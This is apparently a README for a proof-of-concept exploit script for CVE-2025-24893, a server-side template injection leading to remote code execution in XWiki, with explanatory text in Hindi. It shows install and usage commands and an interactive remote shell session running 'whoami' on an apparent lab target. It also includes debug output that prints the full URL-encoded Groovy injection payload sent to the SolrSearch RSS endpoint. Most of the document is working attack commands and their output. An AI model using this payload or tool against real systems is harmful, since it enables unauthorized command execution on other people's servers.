
यह CVE-2025-24893 के लिए rce कमजोरी का एक छोटा स्क्रिप्ट है। यह बुनियादी इनपुट/आउटपुट का समर्थन करता है।
यह PoC पहले SSTI का परीक्षण करता है और यदि यह काम करता है तो। यह लूप में जाएगा और आपको रिमोटली कमांड चलाने की अनुमति देता है।
वर्तमान में exec और shell कमांड एक ही काम करते हैं।
python3 -m pip install requirements.txt
python3 poc.py <target>
python3 poc.py http://10.129.137.222:8080
[*] Targeting http://10.129.137.222:8080
[+] Target is vulnerable!
(xwiki-shell) > help
Documented commands (type help <topic>):
========================================
exec exit help shell
(xwiki-shell) > exec whoami
xwiki
स्क्रिप्ट के शीर्ष पर डिबग फ़्लैग आपको उत्पन्न URL दिखाएगा। यह एक debug.log फ़ाइल बनाएगा जिसमें अनुरोध की कच्ची प्रतिक्रिया होगी।
python3 poc.py http://10.129.137.222:8080
[*] Targeting http://10.129.137.222:8080
[DEBUG] URL used: http://10.129.137.222:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22XWIKI_TEST_123%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Response content-type: application/rss+xml;charset=utf-8
[+] Target is vulnerable!
(xwiki-shell) > help
Documented commands (type help <topic>):
========================================
exec exit help shell
(xwiki-shell) > exec whoami
[DEBUG] URL used: http://10.129.137.222:8080/xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22whoami%22.execute%28%29.text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
[DEBUG] Response content-type: application/rss+xml;charset=utf-8
xwiki